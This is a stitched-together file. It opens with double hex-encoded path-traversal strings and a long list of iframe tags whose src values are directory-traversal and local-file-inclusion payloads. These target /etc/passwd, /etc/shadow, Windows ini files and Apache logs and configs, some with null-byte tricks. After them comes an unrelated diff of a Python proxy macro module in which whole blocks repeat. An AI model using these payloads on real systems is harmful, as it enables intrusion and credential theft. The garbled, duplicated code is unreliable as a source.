3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266373737373737326636633666363737333266363537323732366637323265366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663735373337323266366336663633363136633266363137303631363336383635326636633666363737333266363537323732366637323566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637353733373232663663366636333631366332663631373036313633363836353266366336663637373332663635373237323666373232653663323036663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631373036313633363836353266363537323732366637323566366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363533323266363537323732366637323566366336663637
326532653266326532653266326532653266326532653266326532653266326532653266326532653266373636313732326636633666363732663631373036313633363836353266363537323732366637323265366336663637
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663736363137323266366336663637326636313730363136333638363533323266363537323732366637323265366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363537323732366637323566366336663637
32653265326632653265326632653265326632653265326632653265326632653265326632653265326637363631373232663663366636373266363537323732366637323265366336663637
326636353734363332663639366536393734326536343266363137303631363336383635
3266363537343633326636393665363937343265363432663631373036313633363836353332
326636353734363332663638373437343730363432663638373437343730363432653633366636653636
32663635373436333266363137303631363336383635326636313730363136333638363532653633366636653636
3266363537343633326636313730363136333638363532663638373437343730363432653633366636653636
3266363537343633326636313730363136333638363533323266363137303631363336383635333232653633366636653636
32663635373436333266363137303631363336383635333232663638373437343730363432653633366636653636
3266373537333732326636633666363336313663326636313730363136333638363533323266363336663665363632663638373437343730363432653633366636653636
326637353733373232663663366636333631366332663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
326636663730373432663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
32663638366636643635326636313730363136333638363532663638373437343730363432653633366636653636
3266363836663664363532663631373036313633363836353266363336663665363632663638373437343730363432653633366636653636
326636353734363332663631373036313633363836353332326637333639373436353733326436313736363136393663363136323663363532663634363536363631373536633734
3266363537343633326636313730363136333638363533323266373636383666373337343733326536343266363436353636363137353663373435663736363836663733373432653639366536333663373536343635
32663635373436333266373036313733373337373634
32663635373436333266373336383631363436663737
3266363537343633326636373732366637353730
3266363537343633326637333635363337353732363937343739326636373732366637353730
32663635373436333266373336353633373537323639373437393266373036313733373337373634
326636353734363332663733363536333735373236393734373932663735373336353732
326636353734363332663733363536333735373236393734373932663635366537363639373236663665
32663635373436333266373336353633373537323639373437393266366336393664363937343733
32663735373337323266366336393632326637333635363337353732363937343739326636643662373537333635373232653634363536363631373536633734
<iframe width="420" height="315" src="/etc/master.passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/master.passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="etc/shadow%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/..\..\..\..\..\..\winnt\win.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../windows/win.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..//..//..//..//..//boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..\../..\../boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="..\../..\../..\../..\../boot.ini" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="\.....\\\.....\\\....." frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="d:\AppServ\MySQL" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="c:\AppServ\MySQL" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="c:WINDOWS/system32/" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/C:\Program Files" frameborder="0" allowfullscreen></iframe>;
<iframe width="420" height="315" src="/D:\Program Files" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/C:/inetpub/ftproot/" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/boot/grub/grub.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/interrupts" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/cpuinfo" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/proc/meminfo" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../apache/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../apache/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/acces_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/acces.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../etc/httpd/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/access_ log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/access. log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/access_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/access.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/www/logs/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../usr/local/apache/logs/error.l og" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/apache2/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/error_log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="../../../../../../../var/log/error.log" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/init.d/apache" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/init.d/apache2" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/httpd/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache/apache.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/apache2.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/local/apache2/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/local/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/opt/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/home/apache/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/home/apache/conf/httpd.conf" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/sites-available/default" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/apache2/vhosts.d/default_vhost.include" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/shadow" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/group" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/group" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/passwd" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/user" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/environ" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/etc/security/limits" frameborder="0" allowfullscreen></iframe>
<iframe width="420" height="315" src="/usr/lib/security/mkuser.default" frameborder="0" allowfullscreen></iframe>

View file

@ -4,626 +4,297 @@ import os
import random
import re
import stat
from jinja2 import Environment, FileSystemLoader
from pappyproxy.pappy import session
from pappyproxy.util import PappyException, load_reqlist
from twisted.internet import defer
from collections import namedtuple
## Template generating functions
# Must be declared before MacroTemplate class
@defer.inlineCallbacks
def gen_template_args_macro(args):
if len(args) > 0:
reqids = args[0]
reqs = yield load_reqlist(reqids)
else:
reqs = []
defer.returnValue(macro_from_requests(reqs))
from .proxy import InterceptMacro
def gen_template_generator_noargs(name):
def f(args):
subs = {}
subs['macro_name'] = 'Macro %d' % random.randint(1,99999999)
subs['short_name'] = ''
return MacroTemplate.fill_template(name, subs)
return f
class MacroException(Exception):
pass
class Macro(object):
"""
A class representing a macro that can perform a series of requests and add
data to storage.
"""
def __init__(self, filename=''):
self.name = ''
self.short_name = None
self.file_name = '' # name from the file
self.filename = filename or '' # filename we load from
self.source = None
if self.filename:
self.load()
def __repr__(self):
s = self.name
names = []
if hasattr(self.source, 'SHORT_NAME'):
if self.source.SHORT_NAME:
names.append(self.source.SHORT_NAME)
names.append(self.file_name)
s += ' (%s)' % ('/'.join(names))
return "<Macro %s>" % s
def load(self):
if self.filename:
match = re.findall('.*macro_(.*).py$', self.filename)
self.file_name = match[0]
st = os.stat(self.filename)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable macro: %s" % self.filename)
module_name = os.path.basename(os.path.splitext(self.filename)[0])
self.source = imp.load_source('%s'%module_name, self.filename)
if not hasattr(self.source, 'MACRO_NAME'):
raise PappyException('Macro in %s does not define MACRO_NAME' % self.filename)
self.name = self.source.MACRO_NAME
if self.name == '':
raise PappyException('Macro in %s cannot have a blank name' % self.filename)
if hasattr(self.source, 'SHORT_NAME'):
self.short_name = self.source.SHORT_NAME
else:
self.short_name = None
else:
self.source = None
def execute(self, args):
# Execute the macro
if self.source:
self.source.run_macro(args)
class InterceptMacro(object):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
self.name = ''
self.short_name = None
self.intercept_requests = False
self.intercept_responses = False
self.intercept_ws = False
self.async_req = False
self.async_rsp = False
self.async_ws = False
def __repr__(self):
return "<InterceptingMacro (%s)>" % self.name
def init(self, args):
pass
def mangle_request(self, request):
return request
def mangle_response(self, request):
return request.response
def mangle_ws(self, request, message):
return message
@defer.inlineCallbacks
def async_mangle_request(self, request):
defer.returnValue(request)
@defer.inlineCallbacks
def async_mangle_response(self, request):
defer.returnValue(request.response)
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
defer.returnValue(messsage)
class FileInterceptMacro(InterceptMacro):
"""
An intercepting macro that loads a macro from a file.
"""
def __init__(self, filename=''):
def __init__(self, client, filename=''):
InterceptMacro.__init__(self)
self.file_name = '' # name from the file
self.filename = filename or '' # filename we load from
self.name = '' # name from the file
self.file_name = filename or '' # filename we load from
self.source = None
self.client = client
if self.filename:
if self.file_name:
self.load()
def __repr__(self):
s = self.name
names = []
if hasattr(self.source, 'SHORT_NAME'):
if self.source.SHORT_NAME:
names.append(self.source.SHORT_NAME)
names.append(self.file_name)
s += ' (%s)' % ('/'.join(names))
return "<InterceptingMacro %s>" % s
def load(self):
if self.filename:
match = re.findall('.*int_(.*).py$', self.filename)
if len(match) > 0:
self.file_name = match[0]
else:
self.file_name = self.filename
st = os.stat(self.filename)
if self.file_name:
match = re.findall('.*int_(.*).py$', self.file_name)
self.name = match[0]
# yes there's a race condition here, but it's better than nothing
st = os.stat(self.file_name)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable macro: %s" % self.filename)
module_name = os.path.basename(os.path.splitext(self.filename)[0])
self.source = imp.load_source('%s'%module_name, self.filename)
self.name = self.source.MACRO_NAME
if self.name == '':
raise PappyException('Macro in %s cannot have a blank name' % self.filename)
if hasattr(self.source, 'SHORT_NAME'):
self.short_name = self.source.SHORT_NAME
else:
self.short_name = None
if hasattr(self.source, 'mangle_request') and \
hasattr(self.source, 'async_mangle_request'):
raise PappyException('Intercepting macro in %s cannot define both mangle_request and async_mangle_request' % self.filename)
if hasattr(self.source, 'mangle_response') and \
hasattr(self.source, 'async_mangle_response'):
raise PappyException('Intercepting macro in %s cannot define both mangle_response and async_mangle_response' % self.filename)
if hasattr(self.source, 'mangle_ws') and \
hasattr(self.source, 'async_mangle_ws'):
raise PappyException('Intercepting macro in %s cannot define both mangle_ws and async_mangle_ws' % self.filename)
raise MacroException("Refusing to load world-writable macro: %s" % self.file_name)
module_name = os.path.basename(os.path.splitext(self.file_name)[0])
self.source = imp.load_source('%s'%module_name, self.file_name)
else:
self.source = None
# Update what we can do
if self.source and hasattr(self.source, 'mangle_request'):
self.intercept_requests = True
self.async_req = False
elif self.source and hasattr(self.source, 'async_mangle_request'):
self.intercept_requests = True
self.async_req = True
else:
self.intercept_requests = True
self.intercept_requests = False
if self.source and hasattr(self.source, 'mangle_response'):
self.intercept_responses = True
self.async_rsp = False
elif self.source and hasattr(self.source, 'async_mangle_response'):
self.intercept_responses = True
self.async_rsp = True
else:
self.intercept_responses = False
if self.source and hasattr(self.source, 'mangle_ws'):
if self.source and hasattr(self.source, 'mangle_websocket'):
self.intercept_ws = True
self.async_ws = False
elif self.source and hasattr(self.source, 'async_mangle_ws'):
self.intercept_ws = True
self.async_ws = True
else:
self.intercept_ws = False
def init(self, args):
if hasattr(self.source, 'init'):
self.source.init(args)
self.source.init(self.client, args)
def mangle_request(self, request):
if hasattr(self.source, 'mangle_request'):
req = self.source.mangle_request(request)
return req
return self.source.mangle_request(self.client, request)
return request
def mangle_response(self, request):
def mangle_response(self, request, response):
if hasattr(self.source, 'mangle_response'):
rsp = self.source.mangle_response(request)
return rsp
return request.response
return self.source.mangle_response(self.client, request, response)
return response
def mangle_ws(self, request, message):
if hasattr(self.source, 'mangle_ws'):
mangled_ws = self.source.mangle_ws(request, message)
return mangled_ws
def mangle_websocket(self, request, response, message):
if hasattr(self.source, 'mangle_websocket'):
return self.source.mangle_websocket(self.client, request, response, message)
return message
@defer.inlineCallbacks
def async_mangle_request(self, request):
if hasattr(self.source, 'async_mangle_request'):
req = yield self.source.async_mangle_request(request)
defer.returnValue(req)
defer.returnValue(request)
class MacroFile:
"""
A class representing a file that can be executed to automate actions
"""
@defer.inlineCallbacks
def async_mangle_response(self, request):
if hasattr(self.source, 'async_mangle_response'):
rsp = yield self.source.async_mangle_response(request)
defer.returnValue(rsp)
defer.returnValue(request.response)
def __init__(self, filename=''):
self.name = '' # name from the file
self.file_name = filename or '' # filename we load from
self.source = None
if self.file_name:
self.load()
def load(self):
if self.file_name:
match = re.findall('.*macro_(.*).py$', self.file_name)
self.name = match[0]
st = os.stat(self.file_name)
if (st.st_mode & stat.S_IWOTH):
raise MacroException("Refusing to load world-writable macro: %s" % self.file_name)
module_name = os.path.basename(os.path.splitext(self.file_name)[0])
self.source = imp.load_source('%s'%module_name, self.file_name)
else:
self.source = None
def execute(self, client, args):
# Execute the macro
if self.source:
self.source.run_macro(client, args)
MacroTemplateData = namedtuple("MacroTemplateData", ["filename", "description", "argdesc", "fname_fmt"])
class MacroTemplate(object):
_template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"templates")
_template_data = {
'macro': ('macro.py.template',
'Generic macro template',
'[reqids]',
'macro_{fname}.py',
gen_template_args_macro),
'macro': MacroTemplateData('macro.py.tmpl',
'Generic macro template',
'[reqids]',
'macro_{fname}.py'),
'intmacro': ('intmacro.py.template',
'Generic intercepting macro template',
'',
'int_{fname}.py',
gen_template_generator_noargs('intmacro')),
'modheader': ('macro_header.py.template',
'Modify a header in the request and the response if it exists.',
'',
'int_{fname}.py',
gen_template_generator_noargs('modheader')),
'resubmit': ('macro_resubmit.py.template',
'Resubmit all in-context requests',
'',
'macro_{fname}.py',
gen_template_generator_noargs('resubmit')),
'intmacro': MacroTemplateData('intmacro.py.tmpl',
'Generic intercepting macro template',
'[reqids]',
'int_{fname}.py'),
}
@classmethod
def fill_template(cls, template, subs):
loader = FileSystemLoader(session.config.pappy_dir+'/templates')
loader = FileSystemLoader(cls._template_dir)
env = Environment(loader=loader)
template = env.get_template(cls._template_data[template][0])
template = env.get_template(cls._template_data[template].filename)
return template.render(zip=zip, **subs)
@classmethod
@defer.inlineCallbacks
def fill_template_args(cls, template, args=[]):
ret = cls._template_data[template][4](args)
if isinstance(ret, defer.Deferred):
ret = yield ret
defer.returnValue(ret)
@classmethod
def template_filename(cls, template, fname):
return cls._template_data[template][3].format(fname=fname)
return cls._template_data[template].fname_fmt.format(fname=fname)
@classmethod
def template_list(cls):
return [k for k, v in cls._template_data.iteritems()]
def template_names(cls):
for k, v in cls._template_data.iteritems():
yield k
@classmethod
def template_description(cls, template):
return cls._template_data[template][1]
return cls._template_data[template].description
@classmethod
def template_argstring(cls, template):
return cls._template_data[template][2]
return cls._template_data[template].argdesc
## Other functions
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
if hasattr(self.source, 'async_mangle_ws'):
mangled_ws = yield self.source.async_mangle_ws(request, message)
defer.returnValue(mangled_ws)
defer.returnValue(message)
class MacroTemplate(object):
_template_data = {
'macro': ('macro.py.template',
'Generic macro template',
'[reqids]',
'macro_{fname}.py',
gen_template_args_macro),
'intmacro': ('intmacro.py.template',
'Generic intercepting macro template',
'',
'int_{fname}.py',
gen_template_generator_noargs('intmacro')),
'modheader': ('macro_header.py.template',
'Modify a header in the request and the response if it exists.',
'',
'int_{fname}.py',
gen_template_generator_noargs('modheader')),
'resubmit': ('macro_resubmit.py.template',
'Resubmit all in-context requests',
'',
'macro_{fname}.py',
gen_template_generator_noargs('resubmit')),
}
@classmethod
def fill_template(cls, template, subs):
loader = FileSystemLoader(session.config.pappy_dir+'/templates')
env = Environment(loader=loader)
template = env.get_template(cls._template_data[template][0])
return template.render(zip=zip, **subs)
@classmethod
@defer.inlineCallbacks
def fill_template_args(cls, template, args=[]):
ret = cls._template_data[template][4](args)
if isinstance(ret, defer.Deferred):
ret = yield ret
defer.returnValue(ret)
@classmethod
def template_filename(cls, template, fname):
return cls._template_data[template][3].format(fname=fname)
@classmethod
def template_list(cls):
return [k for k, v in cls._template_data.iteritems()]
@classmethod
def template_description(cls, template):
return cls._template_data[template][1]
@classmethod
def template_argstring(cls, template):
return cls._template_data[template][2]
## Other functions
@defer.inlineCallbacks
def async_mangle_ws(self, request, message):
if hasattr(self.source, 'async_mangle_ws'):
mangled_ws = yield self.source.async_mangle_ws(request, message)
defer.returnValue(mangled_ws)
defer.returnValue(message)
class MacroTemplate(object):
_template_data = {
'macro': ('macro.py.template',
'Generic macro template',
'[reqids]',
'macro_{fname}.py',
gen_template_args_macro),
'intmacro': ('intmacro.py.template',
'Generic intercepting macro template',
'',
'int_{fname}.py',
gen_template_generator_noargs('intmacro')),
'modheader': ('macro_header.py.template',
'Modify a header in the request and the response if it exists.',
'',
'int_{fname}.py',
gen_template_generator_noargs('modheader')),
'resubmit': ('macro_resubmit.py.template',
'Resubmit all in-context requests',
'',
'macro_{fname}.py',
gen_template_generator_noargs('resubmit')),
}
@classmethod
def fill_template(cls, template, subs):
loader = FileSystemLoader(session.config.pappy_dir+'/templates')
env = Environment(loader=loader)
template = env.get_template(cls._template_data[template][0])
return template.render(zip=zip, **subs)
@classmethod
@defer.inlineCallbacks
def fill_template_args(cls, template, args=[]):
ret = cls._template_data[template][4](args)
if isinstance(ret, defer.Deferred):
ret = yield ret
defer.returnValue(ret)
@classmethod
def template_filename(cls, template, fname):
return cls._template_data[template][3].format(fname=fname)
@classmethod
def template_list(cls):
return [k for k, v in cls._template_data.iteritems()]
@classmethod
def template_description(cls, template):
return cls._template_data[template][1]
@classmethod
def template_argstring(cls, template):
return cls._template_data[template][2]
## Other functions
def load_macros(loc):
def load_macros(loc, client):
"""
Loads the macros stored in the location and returns a list of Macro objects
"""
macro_files = glob.glob(loc + "/macro_*.py")
macro_objs = []
for f in macro_files:
try:
macro_objs.append(Macro(f))
except PappyException as e:
print str(e)
macro_objs.append(MacroFile(f))
int_macro_files = glob.glob(loc + "/int_*.py")
int_macro_objs = []
for f in int_macro_files:
try:
int_macro_objs.append(FileInterceptMacro(f))
except PappyException as e:
print str(e)
int_macro_objs.append(FileInterceptMacro(client, filename=f))
return (macro_objs, int_macro_objs)
def req_obj_def(req):
lines = req.full_request.splitlines(True)
esclines = [line.encode('string_escape') for line in lines]
params = []
if req.is_ssl:
params.append('is_ssl=True')
if req.port != 443:
params.append('port=%d'%req.port)
else:
if req.port != 80:
params.append('port=%d'%req.port)
if 'host' in req.headers and req.host != req.headers['host']:
params.append('host=%d'%req.host)
if params:
req_params = ', '+', '.join(params)
else:
req_params = ''
ret = 'Request (('
for line in esclines:
ret += "'%s'\n" % line
ret += ')'
ret += req_params
ret += ')'
return ret
def macro_from_requests(reqs, short_name='', long_name=''):
def macro_from_requests(reqs, template='macro'):
# Generates a macro that defines request objects for each of the requests
# in reqs
subs = {}
if long_name:
subs['macro_name'] = long_name
else:
random.seed()
subs['macro_name'] = 'Macro %d' % random.randint(1,99999999)
subs['short_name'] = short_name
req_lines = []
req_params = []
for req in reqs:
lines = req.full_request.splitlines(True)
esclines = [line.encode('string_escape') for line in lines]
lines = req.full_message().splitlines(True)
#esclines = [line.encode('unicode_escape') for line in lines]
esclines = [line for line in lines]
req_lines.append(esclines)
params = []
if req.is_ssl:
params.append('is_ssl=True')
if req.port != 443:
params.append('port=%d'%req.port)
else:
if req.port != 80:
params.append('port=%d'%req.port)
if params:
req_params.append(', '+', '.join(params))
else:
req_params.append('')
params.append('dest_host="{}"'.format(req.dest_host))
params.append('dest_port={}'.format(req.dest_port))
params.append('use_tls={}'.format(req.use_tls))
req_params.append(', '.join(params))
subs['req_lines'] = req_lines
subs['req_params'] = req_params
return MacroTemplate.fill_template('macro', subs)
return MacroTemplate.fill_template(template, subs)
@defer.inlineCallbacks
def mangle_request(request, intmacros):
"""
Mangle a request with a list of intercepting macros.
Returns a tuple that contains the resulting request (with its unmangled
value set if needed) and a bool that states whether the request was modified
Returns (None, True) if the request was dropped.
# @defer.inlineCallbacks
# def mangle_request(request, intmacros):
# """
# Mangle a request with a list of intercepting macros.
# Returns a tuple that contains the resulting request (with its unmangled
# value set if needed) and a bool that states whether the request was modified
# Returns (None, True) if the request was dropped.
:rtype: (Request, Bool)
"""
# Mangle requests with list of intercepting macros
if not intmacros:
defer.returnValue((request, False))
# :rtype: (Request, Bool)
# """
# # Mangle requests with list of intercepting macros
# if not intmacros:
# defer.returnValue((request, False))
cur_req = request.copy()
for macro in intmacros:
if macro.intercept_requests:
if macro.async_req:
cur_req = yield macro.async_mangle_request(cur_req.copy())
else:
cur_req = macro.mangle_request(cur_req.copy())
# cur_req = request.copy()
# for macro in intmacros:
# if macro.intercept_requests:
# if macro.async_req:
# cur_req = yield macro.async_mangle_request(cur_req.copy())
# else:
# cur_req = macro.mangle_request(cur_req.copy())
if cur_req is None:
defer.returnValue((None, True))
# if cur_req is None:
# defer.returnValue((None, True))
mangled = False
if not cur_req == request or \
not cur_req.host == request.host or \
not cur_req.port == request.port or \
not cur_req.is_ssl == request.is_ssl:
